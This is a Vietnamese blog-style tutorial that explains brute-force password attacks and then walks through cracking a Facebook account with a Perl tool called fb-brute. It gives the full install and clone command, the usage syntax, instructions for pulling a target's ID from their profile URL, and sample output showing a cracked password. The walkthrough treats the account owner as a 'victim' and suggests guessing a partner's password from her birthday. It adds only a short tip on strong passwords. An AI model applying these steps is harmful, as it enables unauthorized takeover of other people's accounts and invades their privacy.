brute force là gì - thực hành khai thác mật khẩu facebook bằng phương pháp brute force
xin chào quay trở lại hỡi các chiến binh thiện lành của tui. như tiêu đề các ông thấy, thì trong bài viết hôm nay, chúng ta sẽ cùng tìm hiểu về brute force attack và cùng thực hiện một bài thực hành đơn giản nho nhỏ về brute force đó là brute force mật khẩu facebook bằng công cụ fb-brute.
brute force là gì
hiểu nôm na thìKiểu tấn công brute force là kiểu tấn công được dùng cho tất cả các loại mã hóa. Brute force hoạt động bằng cách thử tất cả các chuỗi mật khẩu có thể để tìm ra mật khẩu. Vì thế nên thời gian cần rất lâu, tùy theo độ dài của mật khẩu nhưng khả năng để tìm ra là luôn luôn nếu không giới hạn thời gian. - theo /wikipedia/
tức là gì ? tức các ông ngồi dò cho đến khi nào đúng thì thôi đấy. giống như lớp của ông làm mất khóa và ông bảo vệ đưa cho ông một chùm hàng chục chiếc khóa và việc của ông là thử cho đến khi đúng khóa thì tui đấy. nếu may thì ông thử quả đầu tiên trúng nhưng nếu kém may mắn hơn, ông thử đến chìa cuối cùng mới trúng thì, hừm, chúc mừng ông quay vào ô nghiệp quật.
thông thường - và theo hiểu biết của tui thì một cuộc tấn công kiểu brute force được thực hiện bắt buộc phải có một trường từ điển [dictionary] chứa tất cả các khả năng - biến cố có thể xảy ra [ở đây nó giống như chùm chìa khóa vậy] và sự thành công của brute force attack đòi hỏi rằng trường từ điển mà các ông sử dụng có chứa các biến cố đúng hay không /tức là có chứa trường hợp đúng hay không - hiểu nôm na là trong chùm chìa khóa của ông bảo vệ đưa cho ông có chứa chìa khóa đúng hay không đấy/
mức độ nguy hiểm à?
cũng tùy, vì thực hiện brute force attack đơn giản nhưng xác xuất thành công khá thấp - theo đánh giá của tui - phải tùy thuộc vào cuốn từ điển mà các ông sử dụng, lí do thì các ông đọc trên nhé. chưa kể một cuộc brute force còn tùy thuộc vào mức độ mạnh yếu của thiết bị được sử dụng để tấn công. trong hầu hết các trường hợp, việc tấn công brute force offline /--tức sử dụng chính thiết bị máy tính của chính mình để thực hiện attack --/ ví dụ trong trường hợp dùng máy tính để brute force mật khẩu wifi sau khi thực hiện capture một handshake(s) thành công với router /-- thì ngoài độ chính xác của từ điển thì mức độ mạnh yếu của máy cũng là một yếu tố quyết định, một CPU mạnh sẽ nhanh hơn một CPU yếu, một GPU mạnh hay một FPGA khỏe cũng vậy /mà tui chắc với các ông rằng chả có:hiếm công cụ nào mà chơi brute force dựa trên CPU đâu, GPU là chủ yếu --/.
brute force thì khá là đơn giản khi thực hiện nhưng lại vô cùng tốn thời gian, thậm chí có thể mất cả đời người để brute force một mật khẩu mạnh mẽ. và tui thấy hầu hết mọi người thường dùng brute force để lấy mật khẩu wifi là chủ yếu (mặc dù nó được áp dụng cho nhiều cái lắm chứ không nên đinh ninh rằng brute force chỉ dành cho wifi đâu) , các diễn đàn lớn nhỏ share các bộ từ điển cho dẫn hack wifi nó chung là cực vip, nhiều cái bá đạo lắm. và cũng hầu hết là offline thui, chứ online thì ... tui có thấy một số công cụ brute force pass người dùng các website, thì đối với các website bảo mật tí tí thì chỉ cần thấy quá nhiều request(s) được gửi tới thì nó ban ip luôn. nói chung là khó đối với người thường như chúng ta.
còn để phòng tránh?
đơn giản nhất là để tránh các trường hợp bị brute force mật khẩu thì các ông/bà nên đặt mật khẩu mạnh tí, kết hợp cả các kí tự đặc biệt, chữ số, chữ hoa chữ thường thì khó bị brute force lắm.
thực hành brute force đối với khai thác mật khẩu facebook
chà, lí thuyết nãy giờ rùi, bây giờ phải thực hành chứ nhỉ. như lí thuyết đã nói, brute force là phương pháp dò vậy giờ chúng ta thử dò mật khẩu facebook bằng phương pháp này nhể.
/báo trước cho các ông là các bài thực hành này là bài thực hành đơn giản và khó áp dụng thực tiễn, trừ khi ông biết trước manh mối - ví dụ ông biết con cờ rút của ông đặt pass là ngày tháng năm sinh của con em nó nhưng ông không biết em nó sinh ngày thang năm nào hay tương tự như thế hoặc ông có list mật khẩu và ông muốn kiểm tra xem may mắn nó có đến với ông không thôi đấy và nói chung đại loại là như vậy, tùy độ may mắn và sự ăn ở của các ông nữa/
trong bài thực hành này, ta sẽ dùng công cụ [fb-brute]
các ông chạy lênh sau để tải và cài đặt tất cả các công cụ cần thiết luôn [áp dụng cho cả termux và linux]
apt update && apt install perl install git libnet-ssleay-perl libssl-dev && git clone https://github.com/Sup3r-Us3r/scripts && cd scripts
lệnh trên sẽ [cập nhật]-[cài đặt ngôn ngữ lập trình perl]-[cài đặt git]-[cài đặt các module cần thiết cho công cụ hoạt động]-[clone mã nguồn công cụ]-[di chuyển vào thư mục chứa công cụ]để kích hoạt công cụ, ta đánh lệnh
perl fb-brute.pl
và để sử dụng công cụ ta có cấu trúc sauperl fb-brute.pl <id_tài_khoản_facebook> <đường_dẫn_file_pass>
trong đó để lấy<id_tài_khoản_facebook>
thì các ông click vào avatar của victim, nhìn địa chỉ url thì hàng số phía sau dòng /fbid=/ chính là thứ ta cần hoặc là tên tài khoản của vitim /hiểu là tên đăng nhập đấy/<đường_dẫn_file_pass>
đơn giản là đường dẫn đến file pass 😒ví dụ, tui cần brute force tài khoản facebook với tên đăng nhập là 01647792xxx và đường dẫn file pass của tui là /home/pass/pass.txt thì tui làm
perl fb-brute.pl 01647792xxx /home/pass/pass.txt
và kết quả làpi@raspberry:~/tools $ perl fb-brute.pl 01647792622 pass.txt
+++ Imad'Ox-Bruter Facebook password Bruter
+++ Coded by Imad'Ox-Hunter
+++ www.fb.com/imad.elouajib
[+] Now Cracking 01647792xxx...
[-] 123123123 -> Not Him :(
[-] 213213123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123123123 -> Not Him :(
[-] 123213 -> Not Him :(
########################################################
[+] Yuuup!! Pass Cracked => Pass is xxxxxxxx :D
########################################################
Hiện nay cách này thường không khả thi khi thực hiện. Khi phát hiện spam facebook sẽ chặn đăng nhập. Trong trường hợp các ông muốn hack tài khoản facebook trên android